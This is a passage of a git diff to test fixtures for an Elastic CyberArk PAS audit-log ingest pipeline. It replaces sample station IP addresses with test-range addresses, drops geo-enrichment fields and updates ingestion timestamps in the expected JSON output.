Category","GatewayStation":""}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 81.32.170.205\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"81.32.170.205","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 34.66.114.180\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"34.66.114.180","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File 
Category","GatewayStation":""}}} -<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File 
Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 67.43.156.13\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"67.43.156.13","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File 
Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json index 92a1e6cd58c..ed15633b613 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json 
@@ -63,7 +63,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164116100Z", + "ingested": "2021-12-09T13:36:36.540129800Z", "original": "\u003c5\u003e1 2021-03-08T18:25:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:25:52\",\"IsoTimestamp\":\"2021-03-08T18:25:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[components] Old Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "106", "kind": "event" @@ -76,20 +76,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -109,7 +97,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -119,7 +107,7 @@ "iso_timestamp": "2021-03-10T18:46:48Z", "file": "Root\\PSMServer.LiveSessions", "safe": "PSMLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update File Category", "message": "Update File Category", "category": "_PSMLiveSessions_1", 
@@ -134,8 +122,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164140400Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540137800Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } 
@@ -147,19 +135,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -179,7 +156,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -189,7 +166,7 @@
 "iso_timestamp": "2021-03-10T22:20:12Z",
 "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions",
 "safe": "PSMLiveSessions",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Update File Category",
 "message": "Update File Category",
 "category": "_PSMLiveSessions_1",
@@ -204,8 +181,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164146400Z", - "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540143Z", + "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } 
@@ -217,20 +194,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -250,20 +215,20 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:38:26Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n 
\u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Update File Category", "issuer": "PSMPApp_VAGRANT", "rfc5424": true, "file": "root\\87012dcc-8290-11eb-949e-080027efd402.session", "safe": "PSMRecordings", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update File Category", "category": "PSMStatus", "timestamp": "Mar 11 09:38:26", 
@@ -276,8 +241,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164169900Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File 
Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.session\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"PSMStatus\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540147600Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.session\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"PSMStatus\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } @@ -289,19 +254,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" 
@@ -321,20 +275,20 @@ }, "related": { "ip": [ - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T20:10:33Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Update File Category", "issuer": "PSMApp_ASR-WIN", "rfc5424": true, "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions", "safe": "PSMLiveSessions", - "station": "34.66.114.180", + "station": "67.43.156.15", "action": "Update File Category", "category": "_PSMLiveSessions_1", "timestamp": "Mar 11 12:10:33", 
